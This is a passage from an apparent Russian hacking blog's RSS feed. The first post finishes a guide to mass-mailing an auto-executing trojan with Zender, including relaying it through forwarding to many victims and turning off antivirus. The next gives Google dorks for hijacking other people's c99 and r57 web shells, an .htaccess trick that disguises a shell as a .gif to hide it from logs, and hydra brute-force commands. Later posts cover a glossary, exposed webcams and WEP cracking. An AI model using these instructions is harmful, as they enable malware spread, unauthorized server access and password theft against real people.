то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит :))))). Удачи.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Даёшь каждому по HYDRA.</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=568</guid>
		<description><![CDATA[Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами. Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать Я не буду описывать здесь брутеры, их качества, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet267.jpg" alt="интернет" />Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами.<br />
Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  Я не буду описывать здесь брутеры, их качества, плюсы, минусы и т.д. и т.п. В данной статье будет поставлена лишь одна цель, завести свою гидру без получения высоких привилегий на сервере, будет достаточно вэб-шелла.<br />
И так, начнём, немного о гидре:<br />
Hydra &#8212; универсальный и уникальный в своём роде брутфорсер, умеет подбирать пароли к MySQL, MSSQL, POP3, IMAP, HTTP, HTTPS, ICQ, SSH, FTP, Basic-auth и др. Имеет встроенную поддержку работы через соксы и прокси. Скачать можно здесь http://thc.org/download.<span id="more-568"></span>php?t=r&#038;f=hydra-5.2-src.tar.gz<br />
Приступим, что нам потребуется:<br />
1. Вэб-шелл на сервере с доступом к коммандному интерпритатору &#8212; 1 шт.<br />
2. Руки 2 шт. Можно обойтись и одной, главное чтоб прямая была <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Многие наверно задались вопросом об вэб-шелле, где же его взять?! Да, вопрос специфичный, а ответ в свою очередь довольно таки простой &#8212; взломать и залить. &#171;Я же новичок?!&#187; подумали сейчас многие! Не спорю, я тоже <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Теперь всё-таки немного придется отойти от нашей намеченной цели. Найдём себе вэб-шелл! Есть один простой, но проверенный способ, набираем в адресной строке браузера google.com, там в свою очередь в поисковой строке вбиваем, что-то типо:<br />
intitle:c99madshell uname filetype:php<br />
intext:c99shell intitle:c99shell<br />
intext:edited by crazydaned<br />
intext:safe-mode: off (not secure)<br />
intitle: &#8212; c99madshell<br />
inanchor:c99shell filetype:php<br />
allintext: uid=() gid=() groups=()safe-mode: off (not secure<br />
intitle:c99madshell uname<br />
(intitle:locus7shell | intitle:r57shell) uname<br />
intitle:r57shell intext:uname<br />
safe-mode: off (no secure)<br />
safe-mode: off (not secure) c99shell<br />
Или подобные &#171;нехитрые&#187; запросы,и получим лист вэб-шеллов проиндексированных поисковиком. Кому не нравится такой способ, доставайте вэб-шеллы сами <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
И так, предположим, что шелл нашли. Смотрим Safe-mode: OFF, это хорошо, один из главных критериев, если наоборот то ищем другой, так же узнаём юзера коммандой id и смотрим /etc/passwd, есть ли доступ к /bin/bash, или к другому интерпритатору комманд, иначе мы не сможем выполнять нужные нам действия. Теперь нужно найти каталог на запись. Немного поковыряв, найдите каталог доступный на запись, и залейте в него архив с гидрой.<br />
Залили? Ок, хорошо. Теперь распаковываем и устанавливаем, чтоб не приходилось выполнять команды отдельно их можно объединить через ;, вбиваем в шелле tar zxf hydra-5.2-src.tar.gz;cd hydra-5.2-src;./configure;make, жмём кнопочку Execute. Смотрим в окне, должен появиться лог выполнения команд, если лога нету, значит у юзера не хватает прав на выполнение. Если всё гуд, далее переходим в каталог hydra-5.2-src. Запускаем гидру, вбиваем ./hydra и любуемся выполнением нашей гидры <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
И так, теперь стоит подумать немного о безопасности, под ней я имею ввиду &#8212; не палить в логах частое обращение к вэб-шеллу, где лежит гидра. А сделаем это мы весьма хитрым образом <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  В первую очередь переименовываем каталог hydra-5.2-src во что-нибудь менее палевное, к примеру, images, вбиваем в командной строке cd ..;mv hydra-5.2-src images. Дальше переходим в переименованный каталог и создаём там файл .htaccess с содержимым:<br />
AddType application/x-httpd-php .gif<br />
Вот теперь зальём наш шелл в этот же каталог уже с расширением .gif и пробуем открыть его, ну как?) В принципе расширение можете выбрать на своё усмотрение, им может стать как .pdf .rar .bmp и с таким же успехом .avi <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  При желании можем даже запаролить этот каталог, сделать доступ по IP и много чего другого, но об этом я писать не буду, т.к. это тема отдельной статьи, да и смысла писать про это нет, читаем ман по Apache <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  Спешу предупредить, что сервер должен поддерживать .htaccess, иначе наш шелл работать не будет и есть вероятность того что нас спалят по логам =<br />
Теперь переходим к самой приятной части. Качаем хорошие словарики для брута, коих сейчас полно, советую лишь одно &#8212; использовать встроенные качалки сервера (наличие таковых узнаём при помощи команды which curl wget get lynx fetch и т.п.), т.к. заливать большие словари со своей тачки будет очень долго.<br />
Манов и видео по использованию данного брутфорсера много, любимый гугл в помощь, но все же пару полезных конструкций приведу:<br />
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 ftp<br />
./hydra -l ftpuser -p ftppass www.site.com -t 255 ftp<br />
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 mysql<br />
./hydra -L logins.txt -P passwords.txt pop.site.com -t 255 pop3<br />
Единственное что хотелось бы выделить, при каждом новом задании лучше сохранять всё в лог опцией -o, либо ставить вывод в файл знаком > (К примеру ./hydra -l hacker -p pass target.com ftp >logfile.txt). Этим самым облегчим себе работу, т.к. не придёться ждать полного выполнения команды, чтоб лицезреть результат, а просто периодически будем мониторить файлик logfile.txt <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  И напоследок хочется сказать, что в данной чудо проге мы можем указывать количество потоков от 1 до 255, и, как правило, часто бывает полезным не напрягать серв на полную катушку <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  В принципе, у меня &#8212; всё, начинаем брутить.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Словарь терминов для новичков часть №1</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=564</guid>
		<description><![CDATA[конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей. Просьба [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet263.jpg" alt="интернет" />конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей.<br />
Просьба не судите строго это моя первая статья и не ругайте за грамматические ошибки так как я пишу в спешке))). Ну ладно поехали&#8230;<br />
Attach &#8212; файл, &#171;прикрепленный&#187; к сообщению электронной почты.<br />
E-mail: (электронная почта) &#8212; рассылка и получение сообщений при помощи электронных средств связи; как правило, это понятие ассоциируется с Интернетом.<span id="more-564"></span><br />
IP-адрес &#8212; это уникальный адрес компьютера в сети Интернет, который состоит из четырех чисел, находящихся в диапазоне от 0 до 255 и разделенных точками. Например: 196.25.5.23. В Интернете можно обратиться к любому подключенному компьютеру, используя IP адрес.<br />
FTP (File Transfer Protocol) &#8212; &#171;протокол передачи файлов&#187;, инструмент для переноса любого файла на узловую машину. Файл можно перекачать (скопировать) по модему на собственный персональный компьютер.<br />
Frame &#8212; специфическая область Web-страницы, содержащая данные из другой страницы.<br />
Hits (хиты) &#8212; число посещений той или иной web-страницы<br />
Hosts (хосты) &#8212; число посетителей той или иной web-страницы с уникальным IP-адресом<br />
HTML (HyperText Markup Language) &#8212; язык описания гипертекста, используемый для размещения информации на Сети в виде гипертекстовых страниц, доступных через программу сканирования сети (browser), поддерживающую HTTP.<br />
HTTP (Hypertext Transport Protocol) &#8212; протокол передачи гипертекста. &#8212; язык, при помощи которого браузер направляет на серверы запросы на web-страницы.<br />
ICQ (I Seek You &#8212; я ищу тебя) &#8212; коммуникационная программа для Интернета, позволяющая обмениваться короткими сообщениями (аналог пейджера), а также пересылать файлы, фото и т.д. Одно из средств общения в Интернете<br />
IP (Интернет-протокол) &#8212; идентификационный номер компьютера, подключенного к Интернету (как телефонный номер); на него также распространяются права интеллектуальной собственности.<br />
Java &#8212; разработанный компанией Sun Microsystems набор спецификаций для создания программ (называемых аплетами), которые можно вставить в Web-страницы и которые выполняются под управлением защищенной среды, обеспечивая высокую степень безопасности.<br />
JavaScript &#8212; язык программирования компании Netscape, с помощью которого можно работать в интерактивном режиме.<br />
Microsoft Internet Explorer &#8212; одна из программ просмотра информации Web-серверах фирмы Microsoft, созданная на основе программы Mosaic.<br />
On-line &#8212; доступ в режиме реального времени (&#171;здесь и сейчас&#187;).<br />
TCP/IP (File Transmission Control Protocol/Internet Protocol) &#8212; два стандартных протокола, используемых для установления соединения между компьютерами, входящими в Интернет. Эти протоколы позволяют различным компьютерным системам производить обмен данных.<br />
Web-интерфейс &#8212; это то, что видит пользователь на сайте в окне своего web-браузера. Другими словами, это совокупность информации и средств навигации на web-сайте, позволяющая пользователю самостоятельно, без применения дополнительных программ пользоваться и управлять этой информацией.<br />
Web-сайт &#8212; это участок Интернета, содержащий информацию, сгруппированную определенным образом. Другими словами, это совокупность web-файлов, которая включает в себя начальный файл, называемый домашней страницей, и другие, именуемые страницами. Просмотреть сайт можно на своем компьютере, используя специальную программу &#171;web-броузер.&#187; Существует большое количество различных web-браузеров, но самыми распространенными среди пользователей являются Internet Explorer (IE) компании Microsoft и Netscape Communicator (NC) компании Netscape.<br />
Web-сервер &#8212; это компьютер, оснащенный специальным программным обеспечением, который может хранить и обрабатывать файлы одного и более web-сайтов. В случае, когда несколько web-сайтов работают на одном компьютере, web-сервером принято называть то виртуальное пространство (программное обеспечение и место на компьютере), в котором работает web-сайт. Поэтому многие говорят &#171;web-сервер&#187;, подразумевая &#171;web-сайт&#187;. Большие web-сайты, содержащие много информации, могут храниться и обрабатываться сразу на нескольких компьютерах. Обмен информацией с web-серверами происходит только по специальным протоколам http:// или https://.<br />
Web-страница &#8212; отдельно взятый файл, находящийся в памяти компьютера, в котором содержится текст в формате HTML, а также графические изображения и гипертекстовые ссылки для взаимодействия с другими страницами.<br />
WWW-адрес &#8212; это адрес сайта, обозначенный по особым правилам веба. Адрес может включать зарегистрированный домен web-сайта, а также &#8212; требуемые каталоги и файлы, расположенные на web-сервере<br />
WWW (World Wide Web) &#8212; &#171;всемирная паутина&#187;, средство для онлайнового доступа к информационным ресурсам Интернет. Это широко распространенный программный продукт, обеспечивающий гипертекстовый переход со страницы на страницу, а также гипертекстовую связь ресурсов Интернет в единую систему, которая предусматривает возможность навигации и поиска.<br />
Unlimited &#8212; схема доступа в Интернет, при которой пользователь покупает доступ на определенный срок (как правило &#8212; месяц). При этом время, проведенное пользователем на линии, не учитывается.<br />
URL (Uniform Resource Locator) &#8212; это &#171;адрес&#187; на WWW, единый указатель на русерс. Представляет собой имя файла или ресурса, позволяющее достичь его через Интернет и включающее, как правило, название протокола, имя узла и путь до файла.<br />
Авторизация &#8212; проверка прав или личности пользователя, необходимая для обеспечения безопасной работы Интернета и целостности секретной информации. Обычно авторизация сводится к набору имени пользователя (логина) и пароля.<br />
Базы данных (БД) &#8212; специальное программное обеспечение, предназначенное для организации хранения информации и доступа к ней. Используются при создании программного обеспечения для систем управления web-сайтом.<br />
Баннер (баннерная реклама) &#8212; в общем случае, это статичное или анимированное изображение, размещаемое на страницах web-сайта с целью рекламы чего-либо. Баннер выполняет роль гиперссылки на тот или иной Интернет-ресурс.<br />
Баннерная реклама &#8212; реклама посредством размещения баннеров на web-сайтах. При проведении баннерной рекламы имеется возможность выбора времени показа и определения целевой аудитории по интересам и территориальному признаку. Цель размещения баннера &#8212; добиться соответствующих действий со стороны пользователя, чтобы на его экране открылась web-страница с рекламируемой информацией.<br />
Баннерные сети &#8212; это специальное программное обеспечение, позволяющее производить обмен баннерами между сайтами &#8212; участниками сети с возможностью выбора времени показа и определения целевой аудитории по интересам и территориальному признаку.<br />
Броузер &#8212; это программа, работающая на компьютере клиента, которая посылает, принимает и отображает файлы в рамках HTTP-протокола. Современные броузеры понимают и другие протоколы, например, FTP или Gopher. В настоящее время наиболее распространенными броузерами являются: Netscape, Internet Explorer, Opera и Mosaic.<br />
Брэндинг &#8212; имиджевая реклама, продвижение какой-либо торговой марки (брэнда). Основная ее цель &#8212; узнаваемость в потребительской среде.<br />
Выделенка &#8212; выделенная линия. Такая обычная телефонная линия проводится телефонной компанией в квартиру, но использует только для Интернета. Поэтому качество связи лучше, скорость может быть больше во много раз чем по телефонной линии, и пользоваться ей можно круглосуточно, не занимая обычного голосового телефона.<br />
Гипертекст &#8212; нелинейная форма записи текстовой информации с обозначением ссылок на фрагменты текста любого документа, находящегося в автоматизированной информационной системе, и возможностью быстрого перехода к этим фрагментам.<br />
Глобальная сеть &#8212; сеть, содержащая большое количество узлов, имеющих, как правило, государственный, континентальный или межконтинентальный характер распределения ресурсов.<br />
Гостевая книга, гостевая (от англ. guestbook) &#8212; раздел сайта, где посетители с помощью специальной формы могут высказать свое мнение о сайте. Большинство гостевых книг позволяют ознакомиться с комментариями других посетителей.<br />
Домен (Доменное имя) &#8212; это часть WWW-адреса web-сайта, которая является его основой. Домены могут быть первого, второго, третьего и т.д. уровней, например, http://www.ru &#8212; домен первого уровня, закрепленный за Российской Федерацией, http://www.mtrx.ru- домен второго уровня. http://catalog.mtrx.ru &#8212; домен третьего уровня. Доменные имена второго уровня регистрируется специальными организациями, координирующими распределение доменных имен. Доменные имена третьего уровня может зарегистрировать администратор соответствующего доменного имени второго уровня, а доменное имя первого уровня Вы легко сможете получить, имея собственное государство.<br />
Индексация &#8212; лексический анализ и разбор текстовых материалов сайта с целью составления списка используемых слов и выражений. Составленный таким образом список используется при поиске информации на сайте по запросу пользователя. Индексация производится в автоматическом режиме специальными программами, называемыми поисковыми роботами. Используется всеми поисковыми системами.<br />
Интернет &#8212; это возможность, благодаря которой Вы сможете получить на своем столе любую информацию из любой точки мира, а также, не вставая со своего рабочего места, повлиять на события, происходящие в любой точке мира.<br />
Интернет/Web-сервер &#8212; это более широкое понятие, обозначающее компьютер (или компьютеры), оснащенный специальным программным обеспечением, обеспечивающий функционирование любых необходимых (а не только веб) сервисов Интернет: http://, https:// (web-сайт), e-mail (электронная почта), ftp, конференции и т.д.<br />
Интранет &#8212; замкнутая внутренняя локальная сеть, построенная по тому же принципу, что и Интернет.<br />
Логин &#8212; идентификатор, используемый для входа в систему.<br />
Локальные сети &#8212; сети, которые содержат небольшое количество узлов и распределяются внутри ограниченной территории (организация, учреждения, университета и т.п.)<br />
Модем &#8212; устройство преобразования данных для передачи их по каналам связи. Модемы бывают внутренними (встроенными) и внешними.<br />
Мультимедиа &#8212; особый вид компьютерной технологии, объединяющей в себе как традиционную статическую (текст, графику), так и динамическую информацию (речь, музыку, видеофрагменты, анимацию и т.д.).<br />
Оптимизация графики &#8212; максимальное уменьшение размера файлов с изображениями при сохранении приемлемого их качества. Используется при создании web-сайта для обеспечения высокой скорости загрузки его страниц.<br />
Поисковые системы &#8212; специальные системы, управляемые через web-интерфейс, позволяющие пользователю находить в сети web-сайты, содержащие необходимую информацию по ключевым словам. Например, http://www.yandex.ru или http://www.google.com.<br />
Порталы &#8212; очень часто посещаемые сайты, выполняющие роль шлюзов во &#171;Всемирную паутину&#187; и вследствие этого представляющие большой интерес для рекламодателей.<br />
Провайдер &#8212; это организация, предоставляющая пользователям сетевые услуги. Это фирма, которой платит пользователь за доступ к Интернет.<br />
Релевантность сайта &#8212; степень соответствия текста сайта ключевым словам, которые указаны в поле определения ключа поиска в поисковой системе. В зависимости от этой величины поисковая система определяет порядок показа результатов поиска. Чем выше у страницы релевантность, тем ближе к началу списка она будет находиться при выдаче результатов поиска.<br />
Регистрация доменного имени &#8212; это закрепление определенного доменного имени за тем или иным лицом путем внесения соответствующей информации в регистрационную базу данных организации, координирующей распределение доменных имен. В России в зоне .ru эти функции осуществляет Региональный Сетевой Информационный Центр. Адрес web-сайта центра http://www.nic.ru/ В 2001 году в России наметилась тенденция передачи прав на регистрацию доменов коммерческим организациям по аналогии с зарубежными схемами. Для зоны .com имена распределяют уполномоченные коммерческие компании. Например, http://www.registrator.com/.<br />
Сервер &#8212; компьютер сети, входящей в Интернет. Сервер обеспечивает обслуживание программ-клиентов, обращающихся к нему по сети. За каждым WWW-адресом, содержимое которого просматривается в броузерах, стоит сервер, который рассылает данные, и сотня других, расположенных между данным сервером и компьютерной системой клиента.<br />
Сеть &#8212; несколько компьютеров, соединенных вместе, что позволяет совместно использовать ресурсы и обмениваться информацией.<br />
Система управления сайтом &#8212; программное обеспечение, позволяющее владельцу web-сайта самостоятельно управлять содержимым этого сайта через web-интерфейс без специальных знаний в области программирования.<br />
Статистика сайта &#8212; статистические данные, полученные путем учета информации о посещении страниц сайта. В простейшем случае включает информацию о количестве и времени посещений.<br />
Узел (или Host) &#8212; компьютер, напрямую подключенный к сети Интернет. Он предназначен для работы пользователей в сети, размещения и хранения информации. Это может быть не только компьютер, но и любое электронное устройство, передающее информацию от одного сервера к другому.<br />
Хостинг &#8212; это размещение web-сайта абонента на оборудовании провайдера.<br />
Хостинг-провайдер (Хостер) &#8212; организация (в основном интернет-провайдер), которая профессионально занимается предоставлением услуг хостинга.<br />
Электронная коммерция &#8212; проведение бизнес-транзакций с помощью возможностей Интернет. Включает в себя любые формы деловой активности в сети.<br />
Юзабильность (юзабилити, usability) &#8212; это степень удобства работы с тем или иным web-сайтом для пользователя.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google помогает подглядывать в чужие веб-камеры</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=565</guid>
		<description><![CDATA[конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности. Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet264.jpg" alt="интернет" />конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности.<br />
Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, что зачастую они подключаются к корпоративной сети компаний по IP-протоколу и имеют прямой выход в Интернет. Функционал камеры позволяет просматривать изображение с нее при помощи обычного браузера, так как само устройство уже имеет встроенный веб-сервер.<span id="more-565"></span> Это удобное изобретение, позволяющее экономить на экранах слежения, может привести к серьезным последствиям, если вовремя не подумать об ограничении такой «свободы слова».<br />
Консультант по вопросам информационной безопасности Роберт Шифрен (Robert Schifreen) создал сайт www.defeatingthehacker.com/videoham/ на котором подробно описал процесс поиска и подключения к открытым камерам слежения. Явление даже получило свое название в Интернете — Video Ham (в английском языке слово ham помимо «ветчины» имеет еще значение «радиолюбитель»).<br />
Сама процедура поиска проста и доступна каждому любопытному пользователю — нужно лишь найти страницы, в адресе которых содержится подстрока «CgiStart? page=Single», на такой запрос Google сразу выдал нам несколько десятков ссылок, среди которых действительно нашлось немало снимков с камер слежения, расположенных в офисных помещениях. Вряд ли владельцы компаний мечтали о том, что за их сотрудниками будет «присматривать» автор российского интернет-журнала.<br />
При всей серьезности проблемы, обеспечить безопасность крайне просто. Во-первых, нужно ограничить доступ к веб-камере корпоративной локальной сетью, исключив IP-адреса внешнего Интернета, во-вторых, необходимо установить пароль на просмотр изображений с камеры. При соблюдении этих несложных правил никакие скучающие пользователи не смогут нанести в ваш дом или офис нежданный визит, пусть даже и виртуальный.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Что такое вардрайвинг (wardriving) и с чем его едят?</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-252/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-252/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=560</guid>
		<description><![CDATA[конецформыначалоформыРазберемся, что такое вардрайвинг (wardriving) и с чем его необходимо употреблять Немногие знают, что такое вардрайвинг, хотя он существует давно. В отличие от привычных способов взлома, научиться вардрайвингу намного проще, так как для него не требуются специфические знания дизассемблирования, необходимые при взломе программ. Тем не менее, профессиональных вардрайверов единицы, и те шифруются. В этом номере [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet259.jpg" alt="интернет" />конецформыначалоформыРазберемся, что такое вардрайвинг (wardriving) и с чем его необходимо употреблять<br />
Немногие знают, что такое вардрайвинг, хотя он существует давно. В отличие от привычных способов взлома, научиться вардрайвингу намного проще, так как для него не требуются специфические знания дизассемблирования, необходимые при взломе программ. Тем не менее, профессиональных вардрайверов единицы, и те шифруются. В этом номере мы приоткроем занавес и расскажем о вардрайвинге.<br />
Что такое вардрайвинг<br />
Вардрайвингом (англ. wardriving &#8212; дословно &#171;военное вождение&#187; или &#171;война на колесах&#187;) называется охота на точки доступа Wi-Fi (никаких зверей при этом убивать не нужно), на те самые точки доступа, которые предназначены для беспроводного подключения к локальной сети или интернету.<span id="more-560"></span> Цель вардрайвера &#8212; найти чужую точку и захватить контроль над ней. Реально вардрайвинг зародился в 50-х годах прошлого века (он еще назывался охотой на лис) и представлял собой вполне легальный вид радиоспорта с четко установленными правилами и международными состязаниями. На пересеченной местности в укромной норе закладывался радиопередатчик, периодически издающий сигналы (лиса), а спортсмены, вооруженные приемниками с направленной антенной, должны были найти ее. С началом перестройки все это умерло. Теперь никому не интересно корпеть над паяльником, изобретая все новые и новые технические решения, и скакать, как козел :). Современное поколение предпочитает охотиться на добычу попроще, используя полностью готовое оборудование и программное обеспечение.<br />
Разработчики vs. Вардрайверы<br />
Стандартный 64-битный ключ шифрования легко взламывается лобовым перебором. Учитывая, что фактическая длина секретного ключа составляет всего лишь 40 бит, в среднем достаточно перебрать 549.755.813.888 комбинаций. При скорости перебора в сотню миллионов ключей в секунду (посильная скорость для современных процессоров) атака займет час-полтора. Злоумышленнику достаточно перехватить один зашифрованный пакет, а затем терзать его до тех пор, пока контрольная сумма расшифрованного пакета не совпадет с ICV. Стучаться на точку доступа при этом совершенно не обязательно. А с учетом существования четырех секретных ключей, продолжительность полного цикла перебора несколько возрастает, однако не столь радикально.<br />
